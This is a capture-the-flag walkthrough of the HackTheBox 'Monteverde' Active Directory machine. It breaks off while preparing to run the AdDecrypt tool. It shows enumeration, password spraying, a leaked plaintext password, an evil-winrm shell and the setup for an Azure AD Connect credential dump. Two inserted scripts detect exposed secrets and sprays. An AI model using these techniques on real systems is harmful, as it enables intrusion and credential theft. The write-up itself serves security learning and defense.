Monteverde

AD box on HTB.

Enumeration:

Port Scanning:

As always we are going to start with nmap to scan for open ports:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]       
└─$ sudo nmap -sCV -p- --min-rate 4000 -oN nmap/services.nmap -vv 10.129.228.111
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-06 00:58 EDT
Nmap scan report for 10.129.228.111                                                                                                                                        
Host is up, received echo-reply ttl 127 (0.12s latency).                                                                                                                   
Scanned at 2025-09-06 00:58:11 EDT for 236s                                                                                                                                
Not shown: 65517 filtered tcp ports (no-response)                                                                                                                          
PORT      STATE SERVICE       REASON          VERSION                                                                                                                      
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus                                                                                                              
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-06 04:59:10Z)                                                               
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
<snipped>
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

<snipped>
|_clock-skew: 1s

<snipped>

So we have another Active Directory box.

I will add the domain and hostname to the hosts file:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ cat /etc/hosts   
127.0.0.1       localhost
127.0.1.1       kali
<snipped>

10.129.228.111 MONTEVERDE.MEGABANK.LOCAL MEGABANK.LOCAL MONTEVERDE

I am going to enumerate shares and users with netexec:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec smb 10.129.228.111 -u '' -p '' --users         
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) 
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
SMB         10.129.228.111  445    MONTEVERDE       -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.129.228.111  445    MONTEVERDE       Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.129.228.111  445    MONTEVERDE       AAD_987d7f2f57d2              2020-01-02 22:53:24 0       Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
SMB         10.129.228.111  445    MONTEVERDE       mhope                         2020-01-02 23:40:05 0        
SMB         10.129.228.111  445    MONTEVERDE       SABatchJobs                   2020-01-03 12:48:46 0        
SMB         10.129.228.111  445    MONTEVERDE       svc-ata                       2020-01-03 12:58:31 0        
SMB         10.129.228.111  445    MONTEVERDE       svc-bexec                     2020-01-03 12:59:55 0        
SMB         10.129.228.111  445    MONTEVERDE       svc-netapp                    2020-01-03 13:01:42 0        
SMB         10.129.228.111  445    MONTEVERDE       dgalanos                      2020-01-03 13:06:10 0        
SMB         10.129.228.111  445    MONTEVERDE       roleary                       2020-01-03 13:08:05 0        
SMB         10.129.228.111  445    MONTEVERDE       smorgan                       2020-01-03 13:09:21 0        
SMB         10.129.228.111  445    MONTEVERDE       [*] Enumerated 10 local users: MEGABANK

With the null session I do not have permission to enumerate shares.

Username as the Password:

Now I will save those users to a file and try several attacks against them, starting with using each username as its own password:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec smb 10.129.228.111 -u users.txt -p users.txt --no-bruteforce --continue-on-success
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:Guest STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata:svc-ata STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-bexec:svc-bexec STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-netapp:svc-netapp STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\dgalanos:dgalanos STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:roleary STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\smorgan:smorgan STATUS_LOGON_FAILURE

Now we have a valid credential pair: sabatchjobs:SABatchJobs.

I did not find anything useful in the BloodHound data.

Let's now try to enumerate the shares:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec smb 10.129.228.111 -u sabatchjobs -p SABatchJobs --shares                         
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) 
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\sabatchjobs:SABatchJobs 
SMB         10.129.228.111  445    MONTEVERDE       [*] Enumerated shares
SMB         10.129.228.111  445    MONTEVERDE       Share           Permissions     Remark
SMB         10.129.228.111  445    MONTEVERDE       -----           -----------     ------
SMB         10.129.228.111  445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.129.228.111  445    MONTEVERDE       azure_uploads   READ            
SMB         10.129.228.111  445    MONTEVERDE       C$                              Default share
SMB         10.129.228.111  445    MONTEVERDE       E$                              Default share
SMB         10.129.228.111  445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.129.228.111  445    MONTEVERDE       NETLOGON        READ            Logon server share 
SMB         10.129.228.111  445    MONTEVERDE       SYSVOL          READ            Logon server share 
SMB         10.129.228.111  445    MONTEVERDE       users$          READ

We have three non-default shares: azure_uploads, E$ and users$, but we only have read access to azure_uploads and users$.

Shell as mhope:

I will use smbclient to interact with those shares:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Monteverde/smb]                  
└─$ smbclient //10.129.228.111/azure_uploads -U 'megabank.local/sabatchjobs%SABatchJobs'
Try "help" to get a list of possible commands.                            
smb: \> dir
  .                                   D        0  Fri Jan  3 07:43:06 2020
  ..                                  D        0  Fri Jan  3 07:43:06 2020
                                          
                31999 blocks of size 4096. 28979 blocks available
smb: \> exit                                                                                                                                                               
                                          
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Monteverde/smb]
└─$ smbclient //10.129.228.111/users$ -U 'megabank.local/sabatchjobs%SABatchJobs'        
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020
                                          
                31999 blocks of size 4096. 28979 blocks available
smb: \> prompt off                                                                   
smb: \> recurse on      
smb: \> mget *                                                                       
getting file \mhope\azure.xml of size 1212 as mhope/azure.xml (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
smb: \> exit

There is an azure.xml file in the mhope directory.

Let's see what it contains:

┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Monteverde/smb]
└─$ cat mhope/azure.xml                                                              
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y********</S>
    </Props>
  </Obj>
</Objs>
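The file is PowerShell CLIXML (the format Export-Clixml writes), and the tell is that the Password property is stored as a plain <S> string rather than a DPAPI-protected <SS> SecureString. As an added example that is not part of the original writeup, the scanner below parses such exports collected from a share sweep and flags secret-like properties, covering both <Props> and the <MS> note properties a PSCustomObject export uses; the sample document is constructed from the listing above with a placeholder password.

```python
"""Scan PowerShell CLIXML exports (Export-Clixml output) for secret-like
properties stored as plain strings, as with the PSADPasswordCredential
found in azure.xml on the users$ share.

Added example for this writeup, not part of the original page or any
project. The sample document is constructed and the password is a placeholder.
"""
import re
import xml.etree.ElementTree as ET

# Namespace of the PowerShell serialization format written by Export-Clixml.
PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
NS = {"ps": PS_NS}

# Property names that usually carry a credential (KeyId deliberately not matched).
SECRET_NAME_RE = re.compile(r"pass(word|wd)|secret|token|api[_-]?key|private[_-]?key", re.I)

# Constructed sample modelled on the azure.xml listing; the password is a placeholder.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">PLACEHOLDER-NOT-A-REAL-PASSWORD</S>
    </Props>
  </Obj>
</Objs>"""


def _local(tag):
    """'{namespace}S' -> 'S'."""
    return tag.rsplit("}", 1)[-1]


def scan_clixml(text):
    """Return findings for secret-like properties in one CLIXML document.

    Each finding records the object's most-derived .NET type, the property
    name, the element kind (S = plain string, SS = DPAPI-protected
    SecureString, Nil = empty) and whether the value is readable as-is.
    Both <Props> (adapted properties) and <MS> (note properties, as written
    for a PSCustomObject) are inspected.
    """
    root = ET.fromstring(text)
    if root.tag != f"{{{PS_NS}}}Objs":
        raise ValueError("not a PowerShell CLIXML document")
    findings = []
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        first_type = obj.find("ps:TN/ps:T", NS)
        type_name = first_type.text if first_type is not None else "<untyped>"
        for container in obj.findall("ps:Props", NS) + obj.findall("ps:MS", NS):
            for prop in container:
                name = prop.get("N", "")
                if not SECRET_NAME_RE.search(name):
                    continue
                kind = _local(prop.tag)
                findings.append({
                    "type": type_name,
                    "property": name,
                    "kind": kind,
                    # Only a bare <S> with content is readable without the exporting user's DPAPI key.
                    "plaintext": kind == "S" and bool(prop.text),
                    "value_length": len(prop.text or ""),
                })
    return findings


def main():
    for f in scan_clixml(SAMPLE_CLIXML):
        state = "PLAINTEXT" if f["plaintext"] else "protected/empty"
        print(f"{f['type']}.{f['property']}: {state} ({f['kind']}, {f['value_length']} chars)")


if __name__ == "__main__":
    main()
```

The scanner reports only the property name, kind and length, never the value, so its output can be stored with the sweep results.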

So we have another password, found in the mhope directory. It is probably mhope's, but we can also spray it against the users we enumerated earlier:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec smb 10.129.228.111 -u users.txt -p passwords.txt --continue-on-success            
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False) 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y******** 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-bexec:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-netapp:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\dgalanos:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:4n0therD4y******** STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\smorgan:4n0therD4y******** STATUS_LOGON_FAILURE

Indeed, it is the password of the mhope domain user.
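Both spray runs above (username as password, then the azure.xml password) leave the same trace on the domain controller: one source failing once against many accounts within seconds, then succeeding on one of them. The detection logic below is an added example for this writeup, not the page's own tooling; the log records are constructed in a simplified form, and the source addresses are made up.

```python
"""Password-spray detection over Windows logon events.

Added example for this writeup, not the page's own tooling. The records are
constructed in a simplified "timestamp event_id account source status" form
such as a SIEM export might produce; real 4625/4624 events carry many more
fields, and the source addresses here are made up.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source fails once against every domain user within
# seconds (the shape of the netexec runs above) and succeeds on one account;
# a second source fails three times against a single account, which is not a spray.
SAMPLE_LOG = """\
2025-09-06T05:02:01Z 4625 MEGABANK\\Guest 10.10.14.5 0xC000006A
2025-09-06T05:02:01Z 4625 MEGABANK\\AAD_987d7f2f57d2 10.10.14.5 0xC000006A
2025-09-06T05:02:02Z 4625 MEGABANK\\mhope 10.10.14.5 0xC000006A
2025-09-06T05:02:02Z 4624 MEGABANK\\SABatchJobs 10.10.14.5 0x0
2025-09-06T05:02:03Z 4625 MEGABANK\\svc-ata 10.10.14.5 0xC000006A
2025-09-06T05:02:03Z 4625 MEGABANK\\svc-bexec 10.10.14.5 0xC000006A
2025-09-06T05:02:04Z 4625 MEGABANK\\svc-netapp 10.10.14.5 0xC000006A
2025-09-06T05:02:04Z 4625 MEGABANK\\dgalanos 10.10.14.5 0xC000006A
2025-09-06T05:02:05Z 4625 MEGABANK\\roleary 10.10.14.5 0xC000006A
2025-09-06T05:02:05Z 4625 MEGABANK\\smorgan 10.10.14.5 0xC000006A
2025-09-06T05:10:00Z 4625 MEGABANK\\roleary 10.10.14.9 0xC000006A
2025-09-06T05:10:30Z 4625 MEGABANK\\roleary 10.10.14.9 0xC000006A
2025-09-06T05:11:00Z 4625 MEGABANK\\roleary 10.10.14.9 0xC000006A
"""


def parse_events(text):
    """Parse the simplified log lines into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, account, source, status = line.split()
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "event_id": int(event_id),   # 4625 failed logon, 4624 successful logon
            "account": account.lower(),
            "source": source,
            "status": status,            # 0xC000006A = wrong password
        })
    return events


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5, max_per_account=2):
    """Flag sources whose failures inside `window` hit at least `min_accounts`
    distinct accounts with no account tried more than `max_per_account` times.
    Brute force of one account trips the second condition, a spray does not.
    Successful logons from the same source during the window are attached."""
    by_source = defaultdict(list)
    for e in events:
        by_source[e["source"]].append(e)
    alerts = {}
    for source, evs in by_source.items():
        evs.sort(key=lambda e: e["time"])
        fails = [e for e in evs if e["event_id"] == 4625]
        start = 0
        for end in range(len(fails)):
            # Advance the window start so fails[start:end+1] spans at most `window`.
            while fails[end]["time"] - fails[start]["time"] > window:
                start += 1
            counts = Counter(e["account"] for e in fails[start:end + 1])
            if len(counts) < min_accounts or max(counts.values()) > max_per_account:
                continue
            t0, t1 = fails[start]["time"], fails[end]["time"]
            alert = alerts.setdefault(source, {
                "source": source, "accounts": set(), "successes": set(),
                "first_seen": t0, "last_seen": t1,
            })
            alert["accounts"].update(counts)
            alert["first_seen"] = min(alert["first_seen"], t0)
            alert["last_seen"] = max(alert["last_seen"], t1)
            # A success from the spraying source during or shortly after the spray
            # marks the account to reset and investigate first.
            alert["successes"].update(
                e["account"] for e in evs
                if e["event_id"] == 4624 and t0 <= e["time"] <= t1 + window)
    return alerts


def main():
    for a in detect_spray(parse_events(SAMPLE_LOG)).values():
        print(f"spray from {a['source']}: {len(a['accounts'])} accounts between "
              f"{a['first_seen']:%H:%M:%S} and {a['last_seen']:%H:%M:%S}; "
              f"successful: {sorted(a['successes']) or 'none'}")


if __name__ == "__main__":
    main()
```

On a domain controller the same pattern also shows up in 4776 credential-validation events for NTLM logons, so the same grouping by source and distinct account applies there.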

We can use netexec to check other services; we found earlier that WinRM is open, so let's try it:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ netexec winrm monteverde.megabank.local -u mhope -p '4n0therD4y********' 
WINRM       10.129.228.111  5985   MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.228.111  5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y******** (Pwn3d!)

We can see Pwn3d!, which means we can get a shell on the machine because mhope is a member of Remote Management Users.

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ evil-winrm -i 10.129.228.111 -u mhope -p '4n0therD4y********'
                                                                                                                                                                           
Evil-WinRM shell v3.7                                                                                                                                                      
                                                                                                                                                                           
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                            
                                                                                                                                                                           
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                       
                                                                                                                                                                           
Info: Establishing connection to remote endpoint                                                                                                                           
*Evil-WinRM* PS C:\Users\mhope\Documents>

Privilege Escalation:

Let's check who we are:

*Evil-WinRM* PS C:\Users\mhope\Documents> whoami /all
                                                                                                                                                                           
<snipped>                                                                                                                                                    
                                                                                                                                                                           
Group Name                                  Type             SID                                          Attributes                                                       
=========================================== ================ ============================================ ==================================================               
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group               
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group               
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group               
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group               
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group               
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group               
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group               
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group               
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group               
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                                                                   

<snipped>

We can see that we are a member of Azure Admins, which is unusual. I also found a .Azure folder in the mhope directory:

*Evil-WinRM* PS C:\Users\mhope\.Azure> dir


    Directory: C:\Users\mhope\.Azure


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/3/2020   5:35 AM                ErrorRecords
-a----         1/3/2020   5:31 AM             34 AzurePSDataCollectionProfile.json
-a----         1/3/2020   5:35 AM           2794 AzureRmContext.json
-a----         1/3/2020   5:31 AM            191 AzureRmContextSettings.json
-a----         1/3/2020   5:36 AM           7896 TokenCache.dat

If we check for installed applications on that system:

*Evil-WinRM* PS C:\Users\mhope\.Azure> Get-Package | Select-Object Name, Version                                                                                           
                                                                                                                                                                           
Warning: MSG:UnableToDownload «https://go.microsoft.com/fwlink/?LinkID=627338&clcid=0x409» «»                                                                              
Warning: Unable to download the list of available providers. Check your internet connection.                                                                               
                                                                                                                                                                           
Name                                                                    Version                                                                                            
----                                                                    -------                                                                                            
GDR 2027 for SQL Server 2017 (KB4505224) (64-bit)                       14.0.2027.2                                                                                        
Microsoft SQL Server 2017 (64-bit)                                                                                                                                         
Microsoft Help Viewer 2.3                                               2.3.28107                                                                                          
Microsoft Help Viewer 2.3                                               2.3.28107                                                                                          
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810           14.12.25810.0                                                                                      
Microsoft Azure AD Connect Health agent for sync                        3.1.7.0                                                                                            
Microsoft Azure AD Connect Health agent for sync                        3.1.7.0                                                                                            
Microsoft SQL Server Management Studio - 18.4                           15.0.18206.0                                                                                       
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005            12.0.21005.1                                                                                       
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810           14.12.25810.0                                                                                      
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501            12.0.30501.0                                                                                       
Microsoft Visual Studio Tools for Applications 2017                     15.0.27520                                                                                         
SQL Server 2017 Shared Management Objects Extensions                    14.0.1000.169                                                                                      
Microsoft Azure AD Connect                                              1.1.882.0                                                                                          
SQL Server 2017 Common Files                                            14.0.1000.169
SQL Server 2017 Batch Parser                                            14.0.1000.169
Microsoft ODBC Driver 17 for SQL Server                                 17.4.1.1
Microsoft Azure AD Connect synchronization services                     1.1.882.0
Microsoft Analysis Services OLE DB Provider                             15.0.2000.20
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.12.25810          14.12.25810
VMware Tools                                                            10.3.2.9925305
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005              12.0.21005
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005           12.0.21005
Microsoft SQL Server 2017 Setup (English)                               14.0.2027.2
Microsoft SQL Server 2012 Command Line Utilities                        11.4.7001.0
SQL Server 2017 DMF                                                     14.0.1000.169 
Microsoft SQL Server 2017 T-SQL Language Service                        14.0.1000.169 
SQL Server 2017 Shared Management Objects                               14.0.1000.169 
SQL Server 2017 Database Engine Shared                                  14.0.1000.169 
SQL Server Management Studio                                            15.0.18206.0
SQL Server 2017 Connection Info                                         14.0.1000.169 
SQL Server 2017 SQL Diagnostics                                         14.0.1000.169 
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005           12.0.21005
Browser for SQL Server 2017                                             14.0.1000.169 
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005              12.0.21005
Microsoft SQL Server 2012 Native Client                                 11.4.7462.6
Microsoft Visual C++ 2017 x64 Additional Runtime - 14.12.25810          14.12.25810
SSMS Post Install Tasks                                                 15.0.18206.0
SQL Server Management Studio for Reporting Services                     15.0.18206.0
Microsoft VSS Writer for SQL Server 2017                                14.0.1000.169 
Microsoft SQL Server 2017 RsFx Driver                                   14.0.2027.2
SQL Server 2017 Database Engine Services                                14.0.1000.169 
Microsoft OLE DB Driver for SQL Server                                  18.2.3.0
Visual Studio 2017 Isolated Shell for SSMS                              15.0.28307.421
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.12.25810             14.12.25810
Microsoft ODBC Driver 13 for SQL Server                                 14.0.2027.2
SQL Server 2017 XEvent                                                  14.0.1000.169 
Integration Services                                                    15.0.1900.63
Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.12.25810             14.12.25810
Microsoft Visual Studio Tools for Applications 2017 x64 Hosting Support 15.0.27520
SQL Server Management Studio for Analysis Services                      15.0.18206.0
Microsoft Visual Studio Tools for Applications 2017 x86 Hosting Support 15.0.27520
Active Directory Authentication Library for SQL Server                  15.0.1300.359 
Az.Accounts                                                             1.6.6
Az.Resources                                                            1.9.0

The same shows up under Program Files:

*Evil-WinRM* PS C:\Program Files> dir


    Directory: C:\Program Files


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   9:36 PM                Common Files
d-----         1/2/2020   2:46 PM                internet explorer
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync
d-----         1/2/2020   2:38 PM                Microsoft SQL Server
d-----         1/2/2020   2:25 PM                Microsoft Visual Studio 10.0
d-----         1/2/2020   2:32 PM                Microsoft.NET
d-----         1/3/2020   5:28 AM                PackageManagement
d-----         1/2/2020   9:37 PM                VMware
d-r---         1/2/2020   2:46 PM                Windows Defender
d-----         1/2/2020   2:46 PM                Windows Defender Advanced Threat Protection
d-----        9/15/2018  12:19 AM                Windows Mail
d-----         1/2/2020   2:46 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----         1/2/2020   2:46 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----         1/3/2020   5:28 AM                WindowsPowerShell

We find Microsoft Azure AD Connect, which is not installed by default on an Active Directory machine.

I searched online for how I could abuse this, and found a Medium article stating that we can dump credentials from it. In its references the author mentions a VbScrub binary that can dump the credentials, so let's search for it.

As he stated:

The Azure AD Connect service is essentially responsible for synchronizing things between your local AD domain, and the Azure based domain. However, to do this it needs privileged credentials for your local domain so that it can perform various operations such as syncing passwords etc.

And he provided a binary that we can use to abuse this feature.

What this tool does:

  1. It connects to the MSSQL database.

  2. It pulls instance_id, keyset_id and entropy from mms_server_configuration, because those values are needed later for decryption.

  3. From mms_management_agent it reads private_configuration_xml, which contains the username, and encrypted_configuration, which contains the encrypted password.

  4. It decrypts the password and prints the result to the terminal.

I will download it and unzip it:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ wget https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
--2025-09-06 01:44:25--  https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
Resolving github.com (github.com)... 20.233.83.145
Connecting to github.com (github.com)|20.233.83.145|:443... connected.
HTTP request sent, awaiting response... 302 Found
Resolving release-assets.githubusercontent.com (release-assets.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.109.133, ...
Connecting to release-assets.githubusercontent.com (release-assets.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 152818 (149K) [application/octet-stream]
Saving to: ‘AdDecrypt.zip’

AdDecrypt.zip                              100%[=======================================================================================>] 149.24K  --.-KB/s    in 0.1s    

2025-09-06 01:44:41 (1.37 MB/s) - ‘AdDecrypt.zip’ saved [152818/152818]

                                                                                                                                                                           
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Monteverde]
└─$ unzip AdDecrypt.zip                                             
Archive:  AdDecrypt.zip
  inflating: AdDecrypt.exe           
  inflating: mcrypt.dll

As he mentioned, we need to upload both the binary and the DLL to the target machine:

*Evil-WinRM* PS C:\Users\mhope\Downloads> upload AdDecrypt.exe
                                        
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Monteverde/AdDecrypt.exe to C:\Users\mhope\Downloads\AdDecrypt.exe
                                        
Data: 19796 bytes of 19796 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Downloads> upload mcrypt.dll
                                        
Info: Uploading /home/kali/Desktop/CTF/Machines/HackTheBox/Monteverde/mcrypt.dll to C:\Users\mhope\Downloads\mcrypt.dll
                                        
Data: 445664 bytes of 445664 bytes copied
                                        
Info: Upload successful!

Then, with the Bin directory of Microsoft Azure AD Sync as our working directory, we run the binary with -FullSQL to use Windows authentication:

